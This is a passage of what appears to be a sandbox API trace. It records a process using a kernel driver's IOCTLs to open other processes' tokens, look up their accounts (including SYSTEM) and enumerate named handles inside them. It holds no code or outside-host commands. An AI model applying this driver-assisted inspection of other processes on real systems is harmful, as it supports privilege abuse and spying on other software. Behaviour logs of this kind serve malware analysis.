PriorityBoost=0) [0247.594] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x85c) returned 0xc8 [0247.594] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0247.595] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002fd8460, HandleInformation=0x0) returned 0x0 [0247.595] ObOpenObjectByPointer (in: Object=0xfffffa8002fd8460, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0247.595] ObfDereferenceObject (Object=0xfffffa8002fd8460) returned 0x31 [0247.595] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002545e80 | out: TokenHandle=0xfffffa8002545e80*=0xc4) returned 0x0 [0247.595] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0247.595] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.595] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0247.595] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0247.712] CloseHandle (hObject=0xc4) returned 1 [0247.712] CloseHandle (hObject=0xc8) returned 1 [0247.712] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.712] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0247.712] PsLookupProcessByProcessId (in: ProcessId=0x85c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.712] PsAcquireProcessExitSynchronization () returned 0x0 [0247.712] KeStackAttachProcess (in: PROCESS=0xfffffa8002fd8460, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fd8460, ApcState=0xfffff880053c85d0) [0247.712] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80019cac70, HandleInformation=0x0) returned 0x0 [0247.712] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.712] PsReleaseProcessExitSynchronization () returned 0x2 [0247.712] ObfDereferenceObject (Object=0xfffffa8002fd8460) returned 0x2f [0247.712] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.712] ObfDereferenceObject (Object=0xfffffa80019cac70) returned 0x1 [0247.712] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.712] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.713] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.713] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x68, lpOverlapped=0x0) returned 1 [0247.713] PsLookupProcessByProcessId (in: ProcessId=0x85c, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.713] PsAcquireProcessExitSynchronization () returned 0x0 [0247.713] KeStackAttachProcess (in: PROCESS=0xfffffa8002fd8460, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002fd8460, ApcState=0xfffff880053c85d0) [0247.713] ObReferenceObjectByHandle (in: Handle=0xf0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000f62610, HandleInformation=0x0) returned 0x0 [0247.713] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.713] PsReleaseProcessExitSynchronization () returned 0x2 [0247.713] ObfDereferenceObject (Object=0xfffffa8002fd8460) returned 0x2f [0247.713] ObQueryNameString (in: Object=0xfffff8a000f62610, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.713] ObfDereferenceObject (Object=0xfffff8a000f62610) returned 0x7 [0247.713] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.713] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.713] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7c4) returned 0x0 [0247.713] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.713] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.713] PsLookupProcessByProcessId (in: ProcessId=0x7c4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.714] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.714] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.714] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.714] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.714] PsLookupProcessByProcessId (in: ProcessId=0x7c4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.714] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.714] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.714] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ec) returned 0x0 [0247.714] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.714] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.714] PsLookupProcessByProcessId (in: ProcessId=0x6ec, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.714] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.714] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.714] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.714] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.714] PsLookupProcessByProcessId (in: ProcessId=0x6ec, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.715] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.715] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.715] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.715] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.715] PsLookupProcessByProcessId (in: ProcessId=0x6ec, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.715] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.715] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.715] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.715] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.715] PsLookupProcessByProcessId (in: ProcessId=0x6ec, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.715] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.715] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.715] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.715] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.716] PsLookupProcessByProcessId (in: ProcessId=0x6ec, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.716] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.716] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.716] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.716] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.716] PsLookupProcessByProcessId (in: ProcessId=0x6ec, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.716] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.716] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.716] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.716] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x1f0b20, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0247.716] PsLookupProcessByProcessId (in: ProcessId=0x6ec, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0xc000000b [0247.716] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.716] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a4) returned 0xc8 [0247.716] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0247.716] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80021bb5c0, HandleInformation=0x0) returned 0x0 [0247.716] ObOpenObjectByPointer (in: Object=0xfffffa80021bb5c0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff80000664) returned 0x0 [0247.717] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x23 [0247.717] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000664, DesiredAccess=0x8, TokenHandle=0xfffffa80030a0180 | out: TokenHandle=0xfffffa80030a0180*=0xc4) returned 0x0 [0247.717] ZwClose (Handle=0xffffffff80000664) returned 0x0 [0247.717] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.717] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0247.717] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0247.719] CloseHandle (hObject=0xc4) returned 1 [0247.719] CloseHandle (hObject=0xc8) returned 1 [0247.719] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.719] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0247.719] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.719] PsAcquireProcessExitSynchronization () returned 0x0 [0247.719] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0) [0247.720] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80023eecd0, HandleInformation=0x0) returned 0x0 [0247.720] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.720] PsReleaseProcessExitSynchronization () returned 0x2 [0247.720] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x21 [0247.720] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003086044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003086044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.720] ObfDereferenceObject (Object=0xfffffa80023eecd0) returned 0x1 [0247.720] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.720] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.720] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.720] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0247.720] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.720] PsAcquireProcessExitSynchronization () returned 0x0 [0247.720] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0) [0247.720] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003117a20, HandleInformation=0x0) returned 0x0 [0247.720] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.720] PsReleaseProcessExitSynchronization () returned 0x2 [0247.720] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x21 [0247.720] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.720] ObfDereferenceObject (Object=0xfffffa8003117a20) returned 0x1 [0247.720] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.720] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.720] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.720] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x10e, lpOverlapped=0x0) returned 1 [0247.721] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.721] PsAcquireProcessExitSynchronization () returned 0x0 [0247.721] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0) [0247.721] ObReferenceObjectByHandle (in: Handle=0x20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003130870, HandleInformation=0x0) returned 0x0 [0247.721] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.721] PsReleaseProcessExitSynchronization () returned 0x2 [0247.721] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x21 [0247.721] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8508) returned 0x0 [0247.721] ObfDereferenceObject (Object=0xfffffa8003130870) returned 0x1 [0247.721] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.721] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.721] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.721] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0247.721] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.721] PsAcquireProcessExitSynchronization () returned 0x0 [0247.721] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0) [0247.721] ObReferenceObjectByHandle (in: Handle=0x58, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003111c10, HandleInformation=0x0) returned 0x0 [0247.721] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.721] PsReleaseProcessExitSynchronization () returned 0x2 [0247.721] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x21 [0247.721] ObQueryNameString (in: Object=0xfffffa8003111c10, ObjectNameInfo=0xfffffa8003065044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003065044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.722] ObfDereferenceObject (Object=0xfffffa8003111c10) returned 0x1 [0247.722] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.722] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.722] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.722] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0247.722] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.722] PsAcquireProcessExitSynchronization () returned 0x0 [0247.722] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0) [0247.722] ObReferenceObjectByHandle (in: Handle=0xb0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0247.722] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.722] PsReleaseProcessExitSynchronization () returned 0x2 [0247.722] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x21 [0247.722] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.722] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x51 [0247.722] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.723] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.723] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.723] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0247.723] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.723] PsAcquireProcessExitSynchronization () returned 0x0 [0247.723] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0) [0247.723] ObReferenceObjectByHandle (in: Handle=0xb8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a00231fd20, HandleInformation=0x0) returned 0x0 [0247.723] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0247.723] PsReleaseProcessExitSynchronization () returned 0x2 [0247.723] ObfDereferenceObject (Object=0xfffffa80021bb5c0) returned 0x21 [0247.723] ObQueryNameString (in: Object=0xfffff8a00231fd20, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0247.723] ObfDereferenceObject (Object=0xfffff8a00231fd20) returned 0x2 [0247.723] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0247.723] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0247.723] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0247.723] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0247.723] PsLookupProcessByProcessId (in: ProcessId=0x3a4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0247.723] PsAcquireProcessExitSynchronization () returned 0x0 [0247.723] KeStackAttachProcess (in: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80021bb5c0, ApcState=0xfffff880053c85d0) [0247.723] ObReferenceObjectByHandle (in: Handle=0xdc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f72430, HandleInformation=0x0) returned 0x0 [0247.723] 